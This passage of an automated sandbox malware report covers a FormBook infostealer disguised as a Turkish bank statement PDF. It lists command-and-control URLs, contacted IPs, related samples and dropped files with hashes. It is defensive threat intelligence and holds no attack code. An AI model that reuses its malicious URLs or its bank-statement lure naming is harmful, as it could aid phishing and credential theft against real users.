                                                http://www.octohoki.net/ghii/?9WI6t=QaRcz&Y5=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIlepjy8LvksxZfxg==true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.octohoki.net/ghii/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.sem-jobs.com/ghii/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ixirwholesale.xyz/ghii/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.energybig.xyz/ghii/?9WI6t=QaRcz&Y5=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqZV/rA0yzrxWEg==true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.assilajamiart.com/ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH6QHxBezwh0VT5YfLMIY+0KdzPIu3ty6XebiauUbAvcGQ==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wenzid4.top/ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.genuineinsights.cloud/ghii/?Y5=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&9WI6t=QaRcztrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.assilajamiart.com/ghii/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.sem-jobs.com/ghii/?9WI6t=QaRcz&Y5=s7qY3xXjkC1/TbWEYc6+5vkm1XLSScFCKWQ5egwgnE5ocsyGKPoCuhR72/pzoQfhJiIIuERBZ9Gt0DxnImXC1vT81iEZuqsQmQ==true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.energybig.xyz/ghii/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.hubyazilim.com/ghii/?9WI6t=QaRcz&Y5=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g==true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.7dkjhk.com/ghii/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.7dkjhk.com/ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRcztrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.yeah-go.com/ghii/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ladybillplanet.com/ghii/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.genuineinsights.cloud/ghii/true
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.yeah-go.com/ghii/?Y5=bNlPHlhETrwE0CBUTa4Ov0f9IitGRas8007S+k/uRSIn2M4XJq0O4GAgtFn3DdbLFzy6ewAkUq9t07yJukgh3h16R0bz/1ZGgA==&9WI6t=QaRcztrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ixirwholesale.xyz/ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ==true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.fluxgreenn.spaceexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/chrome_newtabrundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                                  		high
                                                  http://www.cutgang.net/ghii/explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/ac/?q=-912K03JO.9.drfalse
                                                    		high
                                                    http://ladybillplanet.com/ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lCexplorer.exe, 00000003.00000002.793176808.0000000015980000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005770000.00000004.10000000.00040000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://img.sedoparking.comexplorer.exe, 00000003.00000002.793176808.0000000015B12000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005902000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.782054035.0000000006EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://assilajamiart.com/ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRHexplorer.exe, 00000003.00000002.793176808.0000000015E36000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005C26000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://search.yahoo.com?fr=crmas_sfpfrundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                                        		high
                                                        http://www.cutgang.net/rundll32.exe, 00000009.00000002.779126189.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.cutgang.netexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.cutgang.net/ghii/?Y5=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8hrundll32.exe, 00000009.00000002.779126189.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.782159260.0000000007232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.de-nagel.com/ghii/explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nortonseecurity.com/ghii/explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.octohoki.netexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.wenzid4.topexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.7dkjhk.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.de-nagel.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ladybillplanet.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.assilajamiart.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.searchvity.com/?dn=explorer.exe, 00000003.00000002.793176808.000000001565C000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.000000000544C000.00000004.10000000.00040000.00000000.sdmptrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        http://www.bemmulher.online/ghii/explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.de-nagel.comHexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.bemmulher.onlineexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                                          		high
                                                          http://www.sem-jobs.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.energybig.xyzexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-912K03JO.9.drfalse
                                                            		high
                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchrundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                                              		high
                                                              http://nsis.sf.net/NSIS_ErrorErrorT.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exefalse
                                                                		high
                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=rundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                                                  		high
                                                                  https://www.sedo.com/services/parking.php3explorer.exe, 00000003.00000002.793176808.0000000015B12000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.0000000005902000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.782054035.0000000006EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=-912K03JO.9.drfalse
                                                                      		high
                                                                      https://search.yahoo.com?fr=crmas_sfprundll32.exe, 00000009.00000003.342891764.000000000721E000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                                                        		high
                                                                        http://www.genuineinsights.cloudexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: phishing
                                                                        		unknown
                                                                        https://www.tucowsdomains.com/rundll32.exe, 00000009.00000002.782054035.0000000006EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.wenzid4.top/ghii/explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://www.searchvity.com/explorer.exe, 00000003.00000002.793176808.000000001565C000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000009.00000002.781464494.000000000544C000.00000004.10000000.00040000.00000000.sdmptrue
                                                                          • URL Reputation: malware
                                                                          		unknown
                                                                          http://www.fluxgreenn.space/ghii/explorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.ixirwholesale.xyzexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.789387698.000000000B764000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.yeah-go.comexplorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=-912K03JO.9.drfalse
                                                                            		high
                                                                            http://www.hubyazilim.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.nortonseecurity.comexplorer.exe, 00000003.00000003.473136282.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.790525427.000000000F51E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            107.148.8.96
                                                                            		www.wenzid4.topUnited States
                                                                            		54600PEGTECHINCUStrue
                                                                            194.102.227.30
                                                                            		cutgang.netRomania
                                                                            		12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                                                            208.100.26.245
                                                                            		www.7dkjhk.comUnited States
                                                                            		32748STEADFASTUStrue
                                                                            23.227.38.74
                                                                            		shops.myshopify.comCanada
                                                                            		13335CLOUDFLARENETUStrue
                                                                            85.159.66.93
                                                                            		natroredirect.natrocdn.comTurkey
                                                                            		34619CIZGITRtrue
                                                                            184.94.215.91
                                                                            		www.energybig.xyzUnited States
                                                                            		394896VXCHNGE-NC01UStrue
                                                                            66.235.200.146
                                                                            		ladybillplanet.comUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            91.195.240.117
                                                                            		www.hubyazilim.comGermany
                                                                            		47846SEDO-ASDEtrue
                                                                            66.96.162.149
                                                                            		www.genuineinsights.cloudUnited States
                                                                            		29873BIZLAND-SDUStrue
                                                                            85.13.156.177
                                                                            		www.sem-jobs.comGermany
                                                                            		34788NMM-ASD-02742FriedersdorfHauptstrasse68DEtrue
                                                                            198.54.117.216
                                                                            		parkingpage.namecheap.comUnited States
                                                                            		22612NAMECHEAP-NETUSfalse
                                                                            141.95.126.89
                                                                            		assilajamiart.comGermany
                                                                            		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                                                                            General Information

                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                            Analysis ID:811416
                                                                            Start date and time:2023-02-18 13:03:46 +01:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 12m 56s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:18
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample file name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@18/12
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HDC Information:
                                                                            • Successful, ratio: 33.3% (good quality ratio 30.7%)
                                                                            • Quality average: 75.6%
                                                                            • Quality standard deviation: 31.2%
                                                                            HCA Information:
                                                                            • Successful, ratio: 95%
                                                                            • Number of executed functions: 64
                                                                            • Number of non-executed functions: 137
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240s for rundll32

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            13:04:59API Interceptor1868x Sleep call for process: explorer.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            107.148.8.96Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wenzid4.top/ghii/?D-=o7lM_tn4_0HKLAP&gXaj8V=MOY5/0rZkCSn1x8B4WS0du0mnN5KW3C6NMBU4rUAiJ09dU/WDm+Fx0/u9tK3DtQGeLOXEwxSHBLi0tUrRAF3Ahbx+eXoKIAlFQ==
                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wenzid4.top/ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==
                                                                            captain.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wenzid4.top/ghii/?Z-y-ON=FXxQJAlmPf&5B=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                                                            6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wenzid4.top/t36v/
                                                                            love pas.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wenzid4.top/ghii/?krza2P=8Vw3GJ&ol9GzD=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==
                                                                            Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                                                            • www.wenzid4.top/ghii/?PCWgxGWo=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&9KUw=bksF2HZ2yak7Rbe
                                                                            194.102.227.30Akbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                              T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                  cnf13429226.vbsGet hashmaliciousFormBookBrowse
                                                                                    captain.exeGet hashmaliciousFormBookBrowse
                                                                                      love pas.exeGet hashmaliciousFormBookBrowse
                                                                                        some one.exeGet hashmaliciousFormBookBrowse
                                                                                          Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            www.genuineinsights.cloudAkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 66.96.162.149
                                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 66.96.162.149
                                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 66.96.162.149
                                                                                            captain.exeGet hashmaliciousFormBookBrowse
                                                                                            • 66.96.162.149
                                                                                            file.exeGet hashmaliciousAgentTesla, FormBookBrowse
                                                                                            • 66.96.162.149
                                                                                            0900664 MOHS Tender..jsGet hashmaliciousFormBookBrowse
                                                                                            • 66.96.162.149

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            PEGTECHINCUSAkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            ZiraatEkstre_202301.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 107.149.230.42
                                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 154.195.83.1
                                                                                            http://kickboxingathome.comGet hashmaliciousUnknownBrowse
                                                                                            • 104.219.208.2
                                                                                            http://137.175.17.190/jawsGet hashmaliciousUnknownBrowse
                                                                                            • 137.175.17.190
                                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 154.195.83.1
                                                                                            captain.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            TRANSFER CONFIRMATION.exeGet hashmaliciousFormBookBrowse
                                                                                            • 198.2.192.82
                                                                                            4iLDIlbK8X.elfGet hashmaliciousMiraiBrowse
                                                                                            • 45.205.88.130
                                                                                            TT Swift($42,072)2.2.23.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.149.76.98
                                                                                            y2OSL6rKkW.exeGet hashmaliciousFormBookBrowse
                                                                                            • 142.4.98.152
                                                                                            6TY2Qkw9KV.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            Pyt5lqAgHP.elfGet hashmaliciousUnknownBrowse
                                                                                            • 108.186.132.182
                                                                                            love pas.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            mgAj1bD1FN.elfGet hashmaliciousMiraiBrowse
                                                                                            • 156.247.76.126
                                                                                            DHL Invoice Details_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.149.195.181
                                                                                            some one.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 107.148.8.96
                                                                                            VODAFONE_ROCharlesdeGaullenr15ROAkbank_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            i2hCoUCBwo.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                            • 81.12.165.53
                                                                                            T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            cnf13429226.vbsGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            captain.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            W3NFvcKgsq.elfGet hashmaliciousMiraiBrowse
                                                                                            • 81.12.165.89
                                                                                            love pas.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            some one.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                            • 194.102.227.30
                                                                                            YYwHP01CiA.elfGet hashmaliciousUnknownBrowse
                                                                                            • 136.255.26.39
                                                                                            DeGHXF1WPn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 81.12.215.12
                                                                                            AqLkwwh89S.elfGet hashmaliciousMiraiBrowse
                                                                                            • 136.255.15.144
                                                                                            ZBdhdOCSw8.elfGet hashmaliciousMiraiBrowse
                                                                                            • 46.97.220.69
                                                                                            zMxKF1sZ6K.dllGet hashmaliciousWannacryBrowse
                                                                                            • 46.97.87.42
                                                                                            boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                            • 46.97.38.82
                                                                                            9ijCf2EmSZ.elfGet hashmaliciousMiraiBrowse
                                                                                            • 81.12.189.85
                                                                                            GoVDsH5Zz1.elfGet hashmaliciousMiraiBrowse
                                                                                            • 81.12.141.95
                                                                                            BG6iIypl6B.elfGet hashmaliciousMiraiBrowse
                                                                                            • 46.97.254.2
                                                                                            Zcd5TGmEz1.elfGet hashmaliciousGafgyt, Mirai, XmrigBrowse
                                                                                            • 81.12.192.229

                                                                                            JA3 Fingerprints

                                                                                            No context

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Temp\-912K03JO

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                            Category:dropped
                                                                                            Size (bytes):94208
                                                                                            Entropy (8bit):1.2882898331044472
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                            MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                            SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                            SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                            SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\cmezd.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):329728
                                                                                            Entropy (8bit):6.605697450998299
                                                                                            Encrypted:false
